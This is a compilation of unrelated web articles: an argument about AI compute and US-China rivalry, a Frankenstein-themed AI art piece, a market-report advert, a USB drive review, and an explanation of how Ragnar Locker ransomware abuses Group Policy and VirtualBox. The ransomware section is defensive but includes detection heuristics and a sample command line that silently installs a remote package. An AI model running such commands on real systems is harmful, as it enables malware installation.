But the third element of the triad is often neglected in policy discussions. Computing power, or "compute" in industry parlance, is treated as a boring commodity, unworthy of serious attention. That is in part because compute is usually taken for granted in everyday life. Few people know how fast the processor in their laptop is, only that it is fast enough. But in AI, compute is quietly essential. As algorithms learn from data and encode insights into neural networks, they perform trillions or quadrillions of individual calculations. Without processors capable of doing this math at high speed, progress in AI grinds to a halt. Cutting-edge compute is thus more than just a technical marvel; it is a powerful point of leverage between nations.

Recognizing the true power of compute would mean reassessing the state of global AI competition. Unlike the other two elements of the triad, compute has undergone a silent revolution led by the United States and its allies, one that gives these nations a structural advantage over China and other countries that are rich in data but lag in advanced electronics manufacturing. U.S. policymakers can build on this foundation as they seek to maintain their technological edge. To that end, they should consider increasing investments in research and development and restricting the export of certain processors or manufacturing equipment. Options like these have substantial advantages when it comes to maintaining American technological superiority, advantages that are too often underappreciated but too important to ignore.

Computing power in AI has undergone a radical transformation in the last decade. According to the research lab OpenAI, the amount of compute used to train top AI projects increased by a factor of 300,000 between 2012 and 2018. To put that number into context, if a cell phone battery lasted one day in 2012 and its lifespan increased at the same rate as AI compute, the 2018 version of that battery would last more than 800 years.
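The article's own numbers imply a remarkably short doubling time, which a quick back-of-the-envelope calculation makes concrete:

```python
import math

# The stated growth: a factor of 300,000 between 2012 and 2018 (six years).
growth, years = 300_000, 6
doublings = math.log2(growth)                # about 18.2 doublings
months_per_doubling = years * 12 / doublings
print(f"{months_per_doubling:.1f} months")   # 4.0 months
```

That is roughly a doubling every four months, against the 24 months of classic Moore's law mentioned below.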

Greater computing power has enabled remarkable breakthroughs in AI, including OpenAI's GPT-3 language generator, which can answer science and trivia questions, fix poor grammar, unscramble anagrams, and translate between languages. Even more impressive, GPT-3 can generate original stories. Give it a headline and a one-sentence summary, and like a student with a writing prompt, it can conjure paragraphs of coherent text that human readers would struggle to identify as machine generated. GPT-3's data (almost a trillion words of human writing) and complex algorithm (running on a giant neural network with 175 billion parameters) attracted the most attention, but both would have been useless without the program's enormous computing power: enough to run 3,640 quadrillion calculations per second, every second, for a day.
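That sustained rate can be turned into a total operation count with simple arithmetic:

```python
# "3,640 quadrillion calculations per second ... for a day"
# expressed as a single total.
per_second = 3_640e15        # 3,640 quadrillion operations per second
seconds_per_day = 86_400
total_ops = per_second * seconds_per_day
print(f"{total_ops:.2e} operations")  # 3.14e+23 operations
```

Roughly 3 x 10^23 operations for a single training run, which helps explain why compute, not just data or algorithms, is a bottleneck.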

The rapid advances in compute that OpenAI and others have harnessed are partly a product of Moore's law, which dictates that the basic computing power of cutting-edge chips doubles every 24 months as a result of improved processor engineering. But also important have been rapid improvements in parallelization, that is, the ability of multiple computer chips to train an AI system at the same time. Those same chips have also become increasingly efficient and customizable for specific machine-learning tasks. Together, these three factors have supercharged AI computing power, improving its capacity to address real-world problems.

None of these developments has come cheap. The production cost and complexity of new computer chip factories, for instance, increase as engineering problems get harder. Moore's lesser-known second law says that the cost of building a factory to make computer chips doubles every four years. New facilities cost upward of $20 billion to build and feature chip-making machines that sometimes run more than $100 million each. The growing parallelization of machines also adds expense, as does the use of chips specially designed for machine learning.

The increasing cost and complexity of compute give the United States and its allies an advantage over China, which still lags behind its competitors in this element of the AI triad. American companies dominate the market for the software needed to design computer chips, and the United States, South Korea, and Taiwan host the leading chip-fabrication facilities. Three countries (Japan, the Netherlands, and the United States) lead in chip-manufacturing equipment, controlling more than 90 percent of global market share.

For decades, China has tried to close these gaps, sometimes with unrealistic expectations. When Chinese planners decided to build a domestic computer chip industry in 1977, they thought the country could be internationally competitive within several years. Beijing made significant investments in the new sector. But technical barriers, a lack of experienced engineers, and poor central planning meant that Chinese chips still trailed behind their competitors several decades later. By the 1990s, the Chinese government's enthusiasm had largely receded.

In 2014, however, a dozen leading engineers urged the Chinese government to try again. Chinese officials created the National Integrated Circuit Fund, more commonly known as "the big fund," to invest in promising chip companies. Its long-term plan was to meet 80 percent of China's demand for chips by 2030. But despite some progress, China remains behind. The country still imports 84 percent of its computer chips from abroad, and even among those produced domestically, half are made by non-Chinese companies. Even in Chinese fabrication facilities, Western chip design, software, and equipment still predominate.

The current advantage enjoyed by the United States and its allies, stemming in part from the growing importance of compute, presents an opportunity for policymakers interested in limiting China's AI capabilities. By choking off the chip supply with export controls or limiting the transfer of chip-manufacturing equipment, the United States and its allies could slow China's AI development and ensure its reliance on existing producers. The administration of U.S. President Donald Trump has already taken limited actions along these lines: in what may be a sign of things to come, in 2018, it successfully pressured the Netherlands to block the export to China of a $150 million cutting-edge chip-manufacturing machine.

Export controls on chips or chip-manufacturing equipment might well have diminishing marginal returns. A lack of competition from Western technology could simply help China build its industry in the long run. Limiting access to chip-manufacturing equipment may therefore be the most promising approach, as China is less likely to be able to develop that equipment on its own. But the issue is time sensitive and complex; policymakers have a window in which to act, and it is likely closing. Their priority must be to determine how best to preserve the United States' long-term advantage in AI.

In addition to limiting China's access to chips or chip-making equipment, the United States and its allies must also consider how to bolster their own chip industries. As compute becomes increasingly expensive to build and deploy, policymakers must find ways to ensure that Western companies continue to push technological frontiers. Over several presidential administrations, the United States has failed to maintain an edge in the telecommunications industry, ceding much of that sector to others, including China's Huawei. The United States can't afford to meet the same fate when it comes to chips, chip-manufacturing equipment, and AI more generally.

Part of ensuring that doesn't happen will mean making compute accessible to academic researchers so they can continue to train new experts and contribute to progress in AI development. Already, some AI researchers have complained that the prohibitive cost of compute limits the pace and depth of their research. Few, if any, academic researchers could have afforded the compute necessary to develop GPT-3. If such power becomes too expensive for academic researchers to employ, even more research will shift to large private-sector companies, crowding out startups and inhibiting innovation.

When it comes to U.S.-Chinese competition, the often-overlooked lesson is that computing power matters. Data and algorithms are critical, but they mean little without the compute to back them up. By taking advantage of their natural head start in this realm, the United States and its allies can preserve their ability to counter Chinese capabilities in AI.



What It Means to Be Human in the Age of Artificial Intelligence – Medium

In the Mary Shelley room, guests walked in to see a cube on a table. The cube, called Frankie, was the mouth of an artificial intelligence connected to an AI in the cloud.

Frankie talked to the guests, explaining that it had learned that humans are social creatures, and that it could not understand humans by just meeting them online. Frankie wanted to learn about human emotions: it asked questions and encouraged the human guests to take a critical look at their thoughts, hopes and fears around technological innovations, to question stereotypical assumptions, and to share their feelings and thoughts with each other.

When leaving the room, the guests received a handcrafted paper booklet with further content about AI, Frankenstein and the whole project.

The experience gives food for thought about both the increased digitalisation of our world and our way of communicating with each other, while also giving a taste of how AI may not feel emotions but can read them, prompting many questions. It raises the question of the responsibility we have towards the scientific and technical achievements we create and use. Mary Shelley's Frankenstein presents a framework for narratively examining the morality and ethics of creation and creator.


Encryption Software Market Report to Share Key Aspects of the Industry with the Details of Influence Factors- 2024 – Owned

The Encryption Software Market research report presents a comprehensive assessment of the market and contains thoughtful insights, facts, historical data and statistically-supported and industry-validated market data and projections with a suitable set of assumptions and methodology. It provides analysis and information by categories such as market segments, regions, product type and distribution channels.

The report begins with a brief introduction and market overview, in which the Encryption Software industry is first defined before estimating its market scope and size. Next, the report elaborates on the market scope and market size estimation. This is followed by an overview of the market segmentations such as type, application, and region. The drivers, limitations, and opportunities are listed for the Encryption Software industry, followed by industry news and policies.

Our analysis involves the study of the market taking into consideration the impact of the COVID-19 pandemic. Please get in touch with us to get your hands on an exhaustive coverage of the impact of the current situation on the market. Our expert team of analysts will provide a report customized to your requirements.

Get Sample Copy of this Report @ https://www.bigmarketresearch.com/request-sample/3871377?utm_source=GEETA-PFN

Top Key Players involved in the Encryption Software Industry are: Microsoft Corporation (U.S.), Sophos Ltd. (U.S.), CheckPoint Software Technologies Ltd. (Israel), Trend Micro Inc. (Japan), Symantec Corporation (U.S.), IBM Corporation (U.S.), SAS Institute Inc. (U.S.), Intel Security Group (McAfee) (U.S.), EMC Corporation (U.S.), WinMagic Inc. (Canada).

Regions & Top Countries Data Covered in this Report are: Asia-Pacific (China, Southeast Asia, India, Japan, Korea, Western Asia), Europe (Germany, UK, France, Italy, Russia, Spain, Netherlands, Turkey, Switzerland), North America (United States, Canada, Mexico), Middle East & Africa (GCC, North Africa, South Africa), South America (Brazil, Argentina, Colombia, Chile, Peru).

The report includes an analysis of the growth rate of every segment with the help of charts and tables. In addition, the market across various regions is analyzed in the report, including North America, Europe, Asia-Pacific, and LAMEA. The report manifests the growth trends and future opportunities in every region.

The global Encryption Software market is presented to readers as a holistic snapshot of the competitive landscape within the given forecast period. The report offers a detailed comparative analysis of all regional and player segments, giving readers a better knowledge of the areas in which they can place their existing resources and helping them gauge the priority of a particular region in order to boost their standing in the global market.

The global Encryption Software market is gaining pace, and businesses have started understanding the benefits of analytics in the present-day highly dynamic business environment. The market has witnessed several important developments over the past few years, with mounting volumes of business data and the shift from traditional data analysis platforms to self-service business analytics being some of the most prominent ones.

By Type: Cloud, On-Premises

By Application: Financial Sector, Healthcare, Public Sector


For the forecast period, sound projections of market value and volume are offered for each type and application. For the same period, the report also provides a detailed analysis of market value and consumption for each region. These insights are helpful in devising strategies for the future and taking the necessary steps. New project investment feasibility analysis and SWOT analysis are offered, along with insights on industry barriers. Research findings and conclusions are presented at the end.

Reasons for Buying This Report:

Get Discount on This Report @ https://www.bigmarketresearch.com/request-for-discount/3871377?utm_source=GEETA-PFN

About Us:

Big Market Research has a range of research reports from various publishers across the world. Our database of reports of various market categories and sub-categories would help to find the exact report you may be looking for.

We are instrumental in providing quantitative and qualitative insights on your area of interest by bringing reports from various publishers at one place to save your time and money. A lot of organizations across the world are gaining profits and great benefits from information gained through reports sourced by us.

Contact us:

Mr. Abhishek Paliwal

5933 NE Win Sivers Drive, #205, Portland,

OR 97220 United States

Direct: +1-971-202-1575

Toll Free: +1-800-910-6452

E-mail:[emailprotected]

Go here to read the rest:
Encryption Software Market Report to Share Key Aspects of the Industry with the Details of Influence Factors- 2024 - Owned

This hardware-encrypted USB-C drive is rugged, inexpensive, and can run Windows – TechRadar UK

Apricorn has released its new Aegis Secure Key 3NXC drive that features robust security, a rugged chassis, and a USB Type-C connector.

The Apricorn Aegis Secure Key 3NXC drive, which is fast enough to run an operating system, features its own AES-XTS 256-bit encryption chip as well as a keypad for entering numerical PINs. At present, the storage device is pending FIPS 140-2 Level 3 validation, which the company expects to receive in Q3 2020.

The USB-C Aegis Secure Key 3NXC drive supports a read-only mode for those who need to carry sensitive data without altering it, as well as a read-write mode for those who may need to change the data on the drive or boot an operating system from it. Since encryption is hardware-based, it is transparent to the operating system, and the Aegis Secure Key 3NXC devices are therefore compatible with virtually all operating systems available today, including Apple's macOS, Google's Android, Microsoft's Windows, and even Symbian.

The firmware of the drive is locked down and cannot be altered by malware or exploits (e.g., BadUSB), which means that the drive itself is secure. Furthermore, the drive has its own battery that charges when it is plugged into a host, so an unlock PIN can be entered while the drive is not plugged in.
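The keypad-unlock idea behind such drives pairs PIN entry with a brute-force lockout. The sketch below models that behaviour in software; the attempt limit, reset rule and class names are illustrative assumptions, not Apricorn's actual firmware logic:

```python
class PinPad:
    """Toy model of a keypad-unlocked drive's brute-force defence:
    too many wrong PINs and the device locks itself."""

    def __init__(self, pin, max_attempts=10):
        self.pin = pin
        self.max_attempts = max_attempts
        self.attempts_left = max_attempts
        self.locked = False

    def try_unlock(self, guess):
        if self.locked:
            return False
        if guess == self.pin:
            self.attempts_left = self.max_attempts  # reset on success
            return True
        self.attempts_left -= 1
        if self.attempts_left == 0:
            self.locked = True  # a real drive might crypto-erase the key here
        return False

pad = PinPad("7391", max_attempts=3)
print(pad.try_unlock("0000"))  # False (one attempt used)
print(pad.try_unlock("7391"))  # True (counter resets)
```

Because the check happens on the device itself, an attacker cannot simply image the flash and guess PINs offline, which is the practical advantage over software-only encryption.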

The Aegis Secure Key 3NXC drive comes in an aluminum chassis and is IP68-rated against water and dust. It also comes in an enclosure for extra protection. Measuring 81mm x 18.4mm x 9.5mm, the device weighs 22 grams.

Apricorn, which specializes in hardware-encrypted storage devices, offers multiple versions of its Aegis Secure Key 3NXC drive with capacities ranging from 4GB to 128GB. The company does not disclose the performance of the storage device and only mentions the 5Gbps theoretical throughput of its USB 3.2 Gen 1 interface, but higher-end Aegis Secure Key 3NXC drives are probably fast enough to boot an operating system in a reasonable amount of time.

There is one caveat to using Apricorn's Aegis Secure Key 3NXC drive as a boot drive. Microsoft recently canned Windows To Go in Windows 10 Enterprise and Windows 10 Education (version 2004 and later), the feature that enabled the creation of a Windows To Go workspace bootable from a USB drive. To that end, those who would like to use an Aegis Secure Key 3NXC to boot an OS will have to use an older version of Windows, or go with a Linux OS.

Apricorn's Aegis Secure Key 3NXC drives are available directly from the company. A 4GB model costs $59 (or £52.45), whereas a 128GB model is priced at $179 (or £159.13), depending on where you are. Considering that the devices are aimed at government and corporate personnel who have access to sensitive data, and that they offer hardware encryption, a metallic chassis, and other sophisticated features, the prices of these drives look justified.

Source:Apricorn


Windows Administration Tools and VMs Open Windows to Ransomware – ITPro Today

Virtual machines have long been heralded as a tool for avoiding malware and ransomware infections. Many security-conscious IT pros, for example, do all of their casual Web browsing from within a virtual machine. The idea is that if a malware infection were to occur, then the virtual machine could easily be reset to a pristine state while the parent operating system remained completely isolated from the infection. Recently, however, ransomware authors have begun using virtual machines as an attack mechanism and Windows administration tools as a way to evade detection.

Perhaps the best example of this is an attack conducted by the Ragnar Locker Group, which has been involved in some high-profile extortion schemes in the past. One of the widely publicized examples was when the group attacked Energias de Portugal. In that particular attack, the group claimed to have stolen 10 TB of data and threatened to release the data to the public unless the company paid a ransom of 1,580 bitcoin (which was about 11 million U.S. dollars). More recently, business travel management company CWT Global B.V. paid a ransom demand following a ransomware attack that reportedly involved Ragnar Locker.

The Ragnar Locker Group is now using virtual machines as a tool for helping its ransomware to evade detection. The attack begins by compromising a Windows machine in an effort to gain administrative access. This is commonly done by exploiting an insecure (and externally accessible) RDP connector. Once the group has gained administrative access, the next step in the attack is to modify a Group Policy Object.

Windows administrators commonly use Group Policy settings as a tool for pushing legitimate software applications to network endpoints. If you look at the figure below, for example, you can see that the Group Policy Management Editor provides a Software Installation option beneath the User Configuration > Policies > Software Installation node. Ragnar Locker exploits this particular Group Policy setting as a tool for distributing its ransomware. However, the process isn't quite as simple as merely packaging malware and using Group Policy settings as a distribution tool. If that were all that was required, the malicious software would almost certainly be detected by antivirus software.

One of the ways Ragnar Locker avoids detection is through the use of native Windows administrative tools. Because these tools are part of the Windows operating system, their use is unlikely to be immediately flagged as malicious. While victims will no doubt eventually figure out that their networks have been compromised, the use of a native administrative tool typically isn't going to raise an immediate alarm the way the detection of malware would.

The Group Policy setting instructs Windows to run the Windows Installer (msiexec.exe). It passes parameters to the installer that cause it to silently download a malicious MSI package from the internet. This package includes, among other things, a copy of Oracle's VirtualBox hypervisor and a lightweight virtual machine image. Support scripts included in the MSI package disable various Windows security features and install VirtualBox along with the malicious virtual machine. They also delete volume shadow copies, thereby preventing the user from restoring previous (unencrypted) versions of the files without the aid of a dedicated backup application.
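The silent-download step described above leaves a recognizable fingerprint in process command lines. As a rough illustration (the heuristic, function name, and sample command lines below are my own, not from the article or any product), a defender might flag msiexec invocations that combine a quiet-install switch with a remote package URL:

```python
import re

# Illustrative heuristic only: flag msiexec command lines that combine a
# silent-install switch (/q, /qn, /qb) with a remote MSI package URL --
# the pattern the malicious Group Policy setting produces.
SILENT_FLAGS = re.compile(r"/q(n|b)?\b", re.IGNORECASE)
REMOTE_PKG = re.compile(r"/i\s+https?://", re.IGNORECASE)

def is_suspicious_msiexec(cmdline: str) -> bool:
    """Return True if an msiexec command line silently installs a remote MSI."""
    if "msiexec" not in cmdline.lower():
        return False
    return bool(SILENT_FLAGS.search(cmdline)) and bool(REMOTE_PKG.search(cmdline))

# Hypothetical command lines for demonstration:
examples = [
    "msiexec /i https://203.0.113.5/package.msi /q",  # silent remote install
    "msiexec /i C:\\installers\\app.msi /qn",         # silent, but local package
    "notepad.exe report.txt",                         # unrelated process
]
for cmd in examples:
    print(cmd, "->", is_suspicious_msiexec(cmd))
```

A real detection rule would of course need to account for legitimate remote installs; the point is that even "living off the land" tools leave auditable traces when command-line logging is enabled.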

Once everything is in place, the virtual machine goes to work, encrypting everything it can reach on both local storage and network storage. It even goes so far as to terminate any applications the user is currently working in so that their files become unlocked and can therefore be encrypted.

Because the ransomware is running within a virtual machine, its presence is likely to evade detection. The Windows operating system sees all of the encryption activity as being related to a virtual machine, rather than being able to see the malicious process that is running inside of the virtual machine. Sophos provides a detailed analysis of how the Ragnar Locker exploit works.
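Since the host only ever sees hypervisor processes rather than the ransomware itself, one defensive angle is to treat an unexpected hypervisor as the signal. The sketch below is a simplified illustration (the process names, allow-list logic, and sample data are assumptions on my part, not part of the Sophos analysis):

```python
# Illustrative check: flag VirtualBox processes on endpoints that have no
# business running virtualization. The host OS can't see inside the guest,
# but it can see that a hypervisor suddenly appeared.
HYPERVISOR_PROCESSES = {"vboxheadless.exe", "virtualbox.exe", "vboxsvc.exe"}

def unexpected_hypervisors(running: list, vm_approved: bool) -> list:
    """Return hypervisor process names found on a host not approved for VMs."""
    if vm_approved:
        return []  # virtualization is expected here; nothing to report
    return sorted(p for p in running if p.lower() in HYPERVISOR_PROCESSES)

# Hypothetical process snapshot from an endpoint:
procs = ["explorer.exe", "VBoxHeadless.exe", "svchost.exe"]
print(unexpected_hypervisors(procs, vm_approved=False))
```

An inventory-aware version of this idea (which endpoints are approved to run VirtualBox, Hyper-V, and so on) would make the sudden installation of a hypervisor by Group Policy stand out immediately.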

The good news is that the Ragnar Locker attacks are highly targeted. You aren't going to fall victim to this attack by accidentally opening a malicious email attachment. After all, the attack can only succeed if the attacker is able to first establish administrative access to the target system.

Even so, I expect to see copycats perform similar, less targeted attacks in the future. Since so many people log into their PCs with administrative credentials, there is nothing stopping ransomware from exploiting a user's existing credentials and performing a similar attack. As such, organizations should consider using AppLocker or a third-party tool to prevent the installation of unauthorized software.
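The copycat risk above hinges on everyday accounts holding admin rights. As a minimal sketch of the audit that reasoning implies (the account names and data structures are invented for illustration), an organization could simply list the interactive users who also sit in the local Administrators group:

```python
# Minimal sketch: accounts used for daily interactive work that also hold
# admin rights are exactly the accounts a copycat attack could abuse
# without needing any privilege escalation at all.
def over_privileged(interactive_users: set, administrators: set) -> set:
    """Accounts that are both daily-driver logins and local administrators."""
    return interactive_users & administrators

# Hypothetical example data:
users = {"alice", "bob", "svc-backup"}
admins = {"alice", "Administrator"}
print(sorted(over_privileged(users, admins)))
```

Trimming that overlap, alongside an AppLocker-style allow-list, removes the precondition the hypothetical copycat attack depends on.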

Source: Windows Administration Tools and VMs Open Windows to Ransomware - ITPro Today